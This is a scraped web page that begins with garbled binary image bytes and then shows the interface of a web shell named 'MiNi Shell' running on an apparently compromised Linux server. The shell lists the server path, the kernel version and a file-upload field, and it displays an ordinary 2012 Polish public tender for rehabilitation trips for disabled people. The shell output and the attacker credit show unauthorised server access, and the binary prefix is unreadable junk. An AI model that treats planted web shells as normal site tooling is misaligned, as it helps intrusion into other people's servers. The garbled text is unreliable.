JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/111963-N-2012.html

<p class="kh_header"><b>Włoszczowa: Zorganizowanie turnusu rehabilitacyjnego oraz wyjazdów rehabilitacyjno - szkoleniowych i szkoleniowego w ramach projektu systemowego pn.: Uwierz w siebie. Program aktywizacji podopiecznych PCPR we Włoszczowie</b><br>
<b>Numer ogłoszenia: 111963 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Wiśniowa 10, 29-100 Włoszczowa, woj. świętokrzyskie, tel. 41 39 44 993, faks 41 39 44 993.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprwloszczowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie turnusu rehabilitacyjnego oraz wyjazdów rehabilitacyjno - szkoleniowych i szkoleniowego w ramach projektu systemowego pn.: Uwierz w siebie. Program aktywizacji podopiecznych PCPR we Włoszczowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie niżej wymienionych usług rehabilitacyjnych i  rehabilitacyjno - szkoleniowych:
ZADANIE NR 1
a)	Moduł I - 14 dniowy wyjazd rehabilitacyjno - szkoleniowy dla opiekunów niepełnosprawnych dzieci wraz z usługą kursu stylizacji i kreowania własnego wizerunku dla opiekunów (34 osoby dorosłe - opiekunowie, 42 niepełnosprawnych dzieci, 17 dzieci stanowiących otoczenie rodziny - rodzeństwo niepełnosprawnych dzieci) 
ZADANIE NR 2
b)	Moduł II - 14 dniowy turnus rehabilitacyjny usprawniająco - rekreacyjny dla kobiet z chorobami nowotworowymi (10 niepełnosprawnych kobiet i 3 opiekunów) 
c)	Moduł III - 14 dniowy wyjazd rehabilitacyjno -szkoleniowy dla osób niepełnosprawnych (30 osób niepełnosprawnych i 10 opiekunów) 
d)	Moduł IV - 7 dniowy wyjazd szkoleniowy dla młodzieży pochodzącej z rodzin zastępczych (6 osób) 
e)	Moduł V - 14 dniowy wyjazd rehabilitacyjno-szkoleniowy (20 osób niepełnosprawnych, 7 opiekunów) 
2.	Zamawiający zastrzega, że Moduł II, Moduł III, Moduł IV i Moduł V zostanie zrealizowany w miejscowości położonej w polskich Tatrach, wszystkie w tym samym ośrodku, przy czym Moduł II i V oraz Moduł III i IV, odbędą się w tym samym terminie.
3.	Zamawiający zastrzega, że Moduł I będzie zrealizowany w miejscowości nadmorskiej.
4.	Zamawiający informuje, że do organizowanych usług będzie stosował prawo opcji. Podane ilości osób są wielkościami, które Zamawiający max skieruje na wyjazd. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmniejszeniu odpowiednio o:
- 6 osób w Module I
- 2 osoby w Module II
- 4 osoby w Module III
- 1 osobę w Module IV
- 3 osoby w Module V.
5.	Wykonawca w ofercie cenowej uwzględnia cenę dla max. liczby uczestników. W przypadku uczestnictwa w turnusach lub wyjazdach mniejszej liczby osób Zamawiający dokona zapłaty za faktyczną ilość osób z zastrzeżeniem pkt. 4. 
6.	Wykonawca zapewni dodatkowy pokój 2 - os. dla kadry zarządzającej oraz wyżywienie w terminach realizacji Modułu I, II, i III.
7.	Zamawiający zastrzega sobie prawo dokonania wizytacji ośrodka zaproponowanego przez Wykonawcę przed podpisaniem umowy i na koszt Wykonawcy. 
Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że są wpisani do rejestru organizatorów turnusów prowadzonego przez wojewodę. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunki określone powyżej. Zamawiający dokona oceny spełnienia tego warunku na podstawie stosownych wpisów załączonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia stanowiącego załącznik Nr 3 do SIWZ. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunki dotyczące doświadczenia określone powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony gdy Wykonawca wykaże, że posiada aktualny wpis ośrodka do rejestru ośrodków prowadzonego przez właściwego wojewodę , w których mogą odbywać się turnusy rehabilitacyjne dla zorganizowanych grup turnusowych osób niepełnosprawnych z odpowiednimi schorzeniami i chorobami. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie wykazu osób stanowiącego załącznik Nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie oświadczenia stanowiącego załącznik Nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Harmonogram turnusu, wyjazdu rehabilitacyjno - szkoleniowego, szkoleniowego 2. Pisemne zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić w następujących przypadkach:
1)	zaistnienia omyłki pisarskiej lub rachunkowej
2)	zaistnienia siły wyższej  mającej wpływ na realizację umowy
3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT
4)	zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminu realizacji turnusu
5)	w przypadku zmniejszenia liczby uczestników turnusu/wyjazdu z przyczyn niezależnych od Zamawiającego i będącego wynikiem: 
a) rezygnacji kandydata z udziału w turnusie/wyjeździe pomimo wcześniejszych deklaracji o uczestnictwie, 
b) niestawienia się kandydata na turnus/wyjazd pomimo wezwania Zamawiającego,
c) przerwania uczestnictwa w turnusie/wyjeździe (choroba, rezygnacja z uczestnictwa), którego nie można było przewidzieć w dniu zawarcia umowy, 
d) stwierdzenia niezdolności do uczestnictwa w turnusie/wyjeździe przez lekarza medycyny, zmianie ulega przeliczenie kosztu turnusu/wyjazdu. W takim przypadku koszt turnusu/wyjazdu stanowi iloczyn kosztu jednego uczestnika (opiekuna, dziecka niepełnosprawnego, dziecka z otoczenia rodziny, młodzieży z rodzin zastępczych, osoby niepełnosprawnej) oraz rzeczywistej ilości uczestników, którzy ukończyli turnus/wyjazd. 
W przypadku przerwania uczestnictwa w turnusie/wyjeździe koszty udziału takiego uczestnika ustala się w wysokości proporcjonalnej do liczby niewykorzystanych dni  turnusu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprwloszczowa.pl/efs/; www.starostwo.wloszczowa.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie we Włoszczowie, ul. Wiśniowa 10 29-100 Włoszczowa, pok. 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie we Włoszczowie, ul. Wiśniowa 10 29-100 Włoszczowa, pok. 205..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Moduł I - 14 dniowy wyjazd rehabilitacyjno - szkoleniowy dla opiekunów niepełnosprawnych dzieci wraz z usługą kursu stylizacji i kreowania własnego wizerunku dla opiekunów (34 osoby dorosłe - opiekunowie, 42 niepełnosprawnych dzieci, 17 dzieci stanowiących otoczenie rodziny - rodzeństwo niepełnosprawnych dzieci).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie 14 dniowego wyjazdu  rehabilitacyjno - szkoleniowego zgodnie z przepisami ustawy z dnia 27 sierpnia 1997r.  o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011r. Nr 127 poz. 721 z późn. zm.) i Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. z 2007r. Nr 230, poz. 1694) w ośrodku uprawnionym do przyjmowania osób niepełnosprawnych z rodzajem niepełnosprawności:
a)	z dysfunkcją narządu ruchu, w tym poruszających się na wózku inwalidzkim, 
b)	z chorobami neurologicznymi, 
c)	z chorobą psychiczną, 
d)	z dysfunkcja narządu wzroku
e)	z dysfunkcją narządu słuchu
f)	ze schorzeniami układu oddechowego
g)	z padaczką 
h)	z upośledzeniem umysłowym
Realizacja modułu w miejscowości nadmorskiej w terminie 23.07.2012 r. - 05.08.2012 r., z możliwością przesunięcia terminu nie więcej niż o 3 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Moduł II - 14 dniowy turnus rehabilitacyjny usprawniająco - rekreacyjny dla kobiet z chorobami nowotworowymi (10 niepełnosprawnych kobiet i 3 opiekunów) 
Moduł III - 14 dniowy wyjazd rehabilitacyjno -szkoleniowy dla osób niepełnosprawnych 
(30 osób niepełnosprawnych i 10 opiekunów) 
Moduł IV - 7 dniowy wyjazd szkoleniowy dla młodzieży pochodzącej z rodzin zastępczych (6 osób) 
Moduł V - 14 dniowy wyjazd rehabilitacyjno-szkoleniowy (20 osób niepełnosprawnych, 
7 opiekunów).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Moduł II - Zorganizowanie 14 dniowego turnusu rehabilitacyjnego usprawniająco - rekreacyjnego zgodnie z przepisami ustawy z dnia 27 sierpnia 1997r.  o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011r. Nr 127 poz. 721 z późn. zm.) i Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. z 2007r. Nr 230, poz. 1694) w ośrodku uprawnionym do przyjmowania osób niepełnosprawnych z rodzajem niepełnosprawności:
a)	kobiety po mastektomii
b)	ze schorzeniami układu krwiotwórczego
c)	z dysfunkcją narządu ruchu
Realizacja modułu w miejscowości w polskich Tatrach w terminie 18.06.2012r. - 01.07.2012r. z możliwością przesunięcia terminu nie więcej niż o 3 dni.
Moduł III - Zorganizowanie 14 dniowego wyjazdu rehabilitacyjno - szkoleniowego zgodnie z przepisami ustawy z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011r. Nr 127 poz. 721 z późn. zm..) i Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. z 2007r. Nr 230, poz. 1694) w ośrodku uprawnionym do przyjmowania osób niepełnosprawnych z rodzajem niepełnosprawności:
a)	z dysfunkcją narządu ruch
b)	ze schorzeniami układu oddechowego
c)	z chorobami neurologicznymi
d)	ze schorzeniami układu krążenia
e)	z chorobą psychiczną
Realizacja modułu w miejscowości w polskich Tatrach w terminie 18.08.2012r. - 31.08.2012r. z możliwością przesunięcia terminu nie więcej niż o 3 dni.
Moduł IV - Zorganizowanie 7 dniowego wyjazdu szkoleniowego. Realizacja modułu w miejscowości w polskich Tatrach w terminie 18.08.2012r. - 24.08.2012r. z możliwością przesunięcia terminu nie więcej niż o 3 dni.
Moduł V - Zorganizowanie 14 dniowego wyjazdu rehabilitacyjno-szkoleniowego zgodnie z przepisami ustawy z dnia 27 sierpnia 1997r.  o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2011r. Nr 127 poz. 721 z późn. zm..) i Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz.U. z 2007r. Nr 230, poz. 1694) w ośrodku uprawnionym do przyjmowania osób niepełnosprawnych z rodzajem niepełnosprawności:
a)	z chorobami neurologicznymi, 
b)	z dysfunkcja narządu ruch w tym poruszających się na wózkach
c)	z chorobą psychiczną, 
d)	ze schorzeniami układu krążenia
e)	ze schorzeniami układu oddechowego
f)	z padaczką 
g)	z upośledzeniem umysłowym
Realizacja modułu w miejscowości w polskich Tatrach w terminie 18.06.2012r. - 01.07.2012r. z możliwością przesunięcia terminu nie więcej niż o 3 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com